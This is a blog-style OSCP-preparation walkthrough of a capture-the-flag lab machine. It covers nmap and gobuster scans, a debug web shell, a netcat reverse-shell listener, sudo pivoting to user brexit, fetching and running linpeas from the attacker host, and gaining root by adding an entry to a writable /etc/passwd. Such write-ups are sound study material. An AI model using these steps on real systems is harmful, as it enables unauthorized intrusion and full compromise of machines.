This would be the 6th machine I’m doing for my OSCP Preparation and I gotta say it was pretty easy XD.
The first step is to find out what is our target machine’s IP address. We can do that by doing a host scan on our network.
sudo nmap -sn 192.168.110.0/24 -oN nmap_discovery
Knowing 192.168.110.133 is our attacker machine’s IP address, we can identify that 192.168.110.144 is our target. Once our target has been identified, we can now perform port scanning on our target with the following:
sudo nmap -sC -sV -Pn -p- 192.168.110.144-oN nmap_port_scan-sC: Load default nmap scripts-sV: Version scan-Pn: Assume all hosts are up-p-: Scans for all 65535 ports-oN: Outputs file in normal format
The results of the port scan reveal that these services are being hosted on the target:
- SSH
- a Web Server
- a second Web Server
- MySQL
With a web server available, directory brute forcing would be our next step. I used gobuster to get the directories on the web server
gobuster dir -u http://192.168.110.144 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.js,.css,.txt -t 100 -o directory_brutedir : Uses gobuster for directory brute forcing
-u : The target’s URL
-w : The wordlist used to enumerate the web server’s directories
-x : Extensions added to the end of every word within the wordlist
-t : Threads used
-o : The output file
For whatever reason, I could not enumerate the first web server so I moved on to the second web server.
From that, we got some interesting directories!
These directories caught my eye:
helpwordpressdevelopmentshelldebug
However, help development and shell revealed nothing of use and I was too lazy to enumerate WordPress so I moved on to the debug directory. Right there I found a debug shell (hence the directory name lol)
Having a shell here means we have remote code execution.
Now that we have remote code execution (RCE), let’s find a reverse shell on PayloadsAllTheThings and let’s listen on port 4444
nc -lvnp 4444This OpenBSD netcatreverse shell seems to work!
Let’s upgrade our shell to make it more interactive with python
python -c 'import pty;pty.spawn("/bin/bash")'
With our current user, let’s see whether we have sudo capabilities with:
sudo -l
It seems that we can launch /bin/bash as the user brexit. Using the following command allows us to interact with the target through the user brexit
sudo -u brexit /bin/bashFrom there, we can access the home directory of brexit and get the user flag.
From here we can use linpeas.sh to automate the enumeration of the target to find privilege escalation vectors. First, I’ll setup a python server on my host on port 80:
python -m http.server 80Then retrieve it from the victim with wget in a writable directory
wget <http://192.168.110.133/linpeas.sh>Make linpeas.sh executable
chmod +x linpeas.shLaunch it
./linpeas.shAnd linpeas.sh found that /etc/passwd is writable!
As /etc/passwd is writable, we can add a new root user into that file with our own password and log into it! So let’s generate our new password with openssl
Then, edit the root entry to this
With that, append the entry to the target’s /etc/passwd file
Finally, switch to the user you have set and get the root flag!
In summary, this challenge is REALLY simple and it reminds me to do proper enumeration of the system as the target might not have only one instance of the service available. If you didn’t perform a proper enumeration then you might get a MISDIRECTION! XD